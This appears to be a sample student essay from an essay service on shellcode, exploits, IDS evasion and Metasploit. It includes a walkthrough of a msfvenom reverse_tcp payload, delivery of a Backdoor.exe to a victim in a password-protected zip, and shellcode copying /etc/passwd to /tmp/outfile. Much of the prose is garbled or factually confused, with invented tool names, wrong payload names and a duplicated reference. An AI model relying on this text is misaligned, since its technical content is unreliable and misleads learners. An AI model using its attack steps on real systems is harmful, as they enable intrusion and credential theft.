Discipline knowledge and capabilities
Shellcodes can be defined as the set of carefully designed instructions that are intended to be injected inside a vulnerable application to gain control over a target application, machine or server. Most of the shellcodes depends on the exploitation of the stack and heap overflow of the memory by the exploitation [2]. In order to exploit the application vulnerability, it executes the underlying assembly codes through the command shell.
Shellcode helps the attacker in order to make the target program to execute or behave in such a manner other than the intended by user. One of the best ways of manipulation of the application programs are, force them to make a syscall or system call. This system calls can be achieved by using the int 0x80 assembly [4]. With the execution of the 0x80 by any application program, CPU of the Linux system switches to kernel mode and later on executes the attacker intended syscall.
Attackers carry out various kinds of attacks on systems by making use of exploit programs. It mainly makes use of bugs in the software which runs on the various system. This program is considered to be evident which is done analyzing it in a proper way. It is mainly done by properly understanding the technical capabilities of any program and to the connection which is developed and used. An exploitation technique can be easily stated as an algorithm which exploits the execution flow of any vulnerable program [2]. Thus it is gaining full control over the attacker. For exploiting the software bug, an attacker not makes use of valid attack but along with a suitable technique. It mainly changes the execution flow and attackers command on any system. The best way to form of any exploit program is known the proof of concept (POC) exploit. Exploit tools are considered to beneficial for attackers to fulfill their intention which is done by the software flaws. An attack vector is the best way to understand any kind of exploit programs which makes proper use of the vulnerability [3]. Without any kind of software issues, it needs a large number of action which is used for triggering any section or part of the code. Three components of the usable exploit are exploited Payload, adding a user account, changing the system configuration. In the last few years, the best way to have an access to the system is to modify the configuration of the system. Different exploit makes use of exploit payload which alters the configuration of the whole system.
Digital literacy
Detection of attacks can be easily done by evasion technique which is considered to be challenging for intrusion detection systems and intrusion prevention system. Five evasion techniques along with their ability have been discussed. Denial of Service (DOS) attack focuses on certain attempts which can be done for exhausting a given resource. Packet splitting is all about chopping given data into small packets. It is mainly done so that a system does not reassemble the whole given packet which is done for signature matching [2]. Duplicate insertion can be considered to be a well-known technique which can easily mislead a system and target host by making use of various TCP/IP packets which is done for duplicate offset or sequence. Shellcode mutation is considered to be an effective tool which is used for changing attacker’s shellcode to escape detection. Attackers on continuous basis try to look for new ways for intruding a system. On the contrary system, developers look for certain ways which can be used for analyzing and detecting attacks [5]. IPS are mainly divided into given category that is signature based or anomaly based. Signature-based attacks look for the various signs of some known attacks in the network so that they can look for frequent updates for maintaining their database up-to-date. Machine learning mainly emphasizes to look for an anomaly in the given traffic network which is different from normal profiles [1]. Along with looking for payload content for size, they typically look for various things like throughput, payload size and number of flow in each and every connection in traffic network and other states.
A program counter can be easily stated as CPU register in the system processor which focus on the address of the following instruction. The instruction is mainly executed from the memory of the system. It digital counter is needed for execution of task along with tracking the present execution point. A program counter can be easily stated as instruction counter, instruction pointer or sequence control register [1]. Various addresses in the memory come up with a specific address. With the processing of each instruction, the software application is responsible for any kind of updating the program counter with the following address which is required to be fetched. After that program counter can easily pass this information to the memory address register which is considered as a part of the execution cycle. Program counter increases the stored value by one during the fetching of next instruction [3]. If anyhow the system is reset or restart, then the program counter converts the given value to zero. The program counter is considered to be similar to process register of the system which is a bank of latches that represent one bit of given value.
Critical thinking
Code injection attack is considered to be one of the most common types of attack in the present computer system. These types of attacks are used for delivering and running arbitrary codes on a victim’s system [1]. It generally provides unauthorized access and control over system resource, data, and application. In code injection attack the first objective of the attacker is to gain control of the program counter of the machine. By having full access of program counter the attacker can easily redirect the program execution which is focused to change the behavior of the program.
Alphanumeric encoding engines are mainly present in Metasploit. The engines can easily arbitrary payloads to the presentation which comprises of letters and numeric digits. These encoding techniques are considered to be important for two reasons [3]. The first thing which is taken into consideration that alphanumeric shellcode which is stored in atypical and some unexpected context. It can be syntactical valid files and directory names and user passwords. The second advantage of alphanumeric shellcode set is that it has some small set of characters which are available in Unicode and UTF-8 encoding [5]. This merely focuses on the fact that the set of instruction which is used for building alphanumeric shellcode is that it is relatively much smaller. For overcoming this type of restriction two methods can be easily used that are patching or self-modification. As the alphanumeric engines provide encoding in an automatic way, a decoder is needed. After that, a challenge arises to encode the required scheme and decode only the alphanumeric characters only. The ultimate goal is for encoding arbitrary payloads.
Identification of the shellcode: This shellcode is used to get the user account data which is copied from /etc/passwd to the /tmp/outfile .
The first command used is “msfconsole” which is helpful to get an idea regarding Metasploit console [4]. The following step is to “show exploit” list of commands which is made available to exploits from any kind of hacking.
In the provided attack, the attacker makes use of “Metasploit/ handler” which helps to establish to the current victim machine. The following step is setting up “PAYLOAD windows” command is mainly to set up payload for the given attack. The next command which has been used is “msfvenom –p windows/interpreter/reverse_tcp LHOST address”. Both the victims and attackers are provided with ports which are intended to carry out the payload. In this whole mechanism, LHOST is the IP address of the given machine to establish a connection. Both the given machines are considered to work in the work in the same network. SET LPORT: It can be easily stated as the port on the victim machine which mainly targets to connect to the whole machine framework [1]. The payload of the attack can be determined and attack vector is used in Backdoor.exe. After that, it is provided to the backdoor file of the victim by zipping it in a proper way with message and password as “zip –password 1234 important .zip”. “Job” command is used to check or analyze the fact that it works on the victim machine. Along with the active session is to look for the active session which is all about exploited command is “Session”.
Problem Solving
For this given attack reverse shellcode has been used for exploiting the attack. Reverse shell is a type of shell in which target machine provides back the idea of attacking machines. Attacking machine is considered to be a listener port to which is associated [2]. It is mainly achieved on the listener port which is associated with it. It is mainly done with the help of code which is being executed.
Some of the methods of shell code generation invulnerability are discussed below:
Msfvenom: At the time of vulnerability exploitation this is considered to be the best technique to use [2]. In this particular method, shellcode can be generated which is done by exploiting on the multiple given platform. In this particular method, the developed shellcode only comprises of ASCII characters.
NASM: It is taken to be the most basic kind of approach which helps in generation of shellcode and along with it requires shellcode by writing it in assembly way. In this methods, shellcodes can be generated with the help of x86_64 assemblers.
Shellforge: It is mainly developed and encoded in python and comes up with the ability to develop shellcodes from C language. C program changes shell codes which makes use of system calls by wrapper classes from the original library. For a proper generation of any shellcode from any C code ShellForge makes use of GCC compiler to change C program into assembler.
Synesthesia approach: This approach is useful in generating the shell codes in such manner that the shellcodes does not contain any null byte in it which is helpful for the IDs to detect any malware used by the attackers.
PNWtools: It is considered to be part of catch the flag (CLF) framework. It is mainly generated with the help of PWN tools which is used for exploiting the development library for any given framework [5]. The tools are developed with the help of the Python language and have been developed in such a way that it can provide rapid development and prototyping.
The biggest plus point of the solution is that we have completed with the help of video. Predefined shellcodes are considered to be suitable for any platform and architecture. In Pawntool the highest level can be created shellcode with the help of msfvenom, after that, it is defined as C functions and provided as payload.
It is defined as a technique which encodes a shellcode which is responsible for the exploitation of vulnerability into the given polymorphism structure which is used for sidestep on IPS. It distinguishes shellcode to indicate the given marks provided which are taken from one couple variations of that particular shellcode. The best method or technique for this polymorphism. A hacker or attacker can easily scramble a pack of shell code [2]. It is prepared to provide a bit to decode and decompress again in the shellcode venture. An inconsequential which is seen in the last case is that it is added or inserted to nop structured which needs to be executed.
References
[1]K. Iwamoto and K. Wasaki, “A Method for Shellcode Extractionfrom Malicious Document Files Using Entropy and Emulation”, International Journal of Engineering and Technology, vol. 8, no. 2, pp. 101-106, 2016.
[2]T. Cheng, Y. Lin, Y. Lai and P. Lin, “Evasion Techniques: Sneaking through Your Intrusion Detection/Prevention Systems”, IEEE Communications Surveys & Tutorials, vol. 14, no. 4, pp. 1011-1020, 2012.
[3]K. Iwamoto and K. Wasaki, “A Method for Shellcode Extractionfrom Malicious Document Files Using Entropy and Emulation”, International Journal of Engineering and Technology, vol. 8, no. 2, pp. 101-106, 2016
[4]W. Kim, S. Kang, K. Kim and S. Kim, “Detecting ShellCode Using Entropy”, KIPS Transactions on Computer and Communication Systems, vol. 3, no. 3, pp. 87-96, 2014.
[5]I. Arce, “The shellcode generation”, IEEE Security & Privacy Magazine, vol. 2, no. 5, pp. 72-76, 2004.
Order an Essay Now & Get These Features For Free:
Turnitin Report
Formatting
Title Page
Citation
Outline
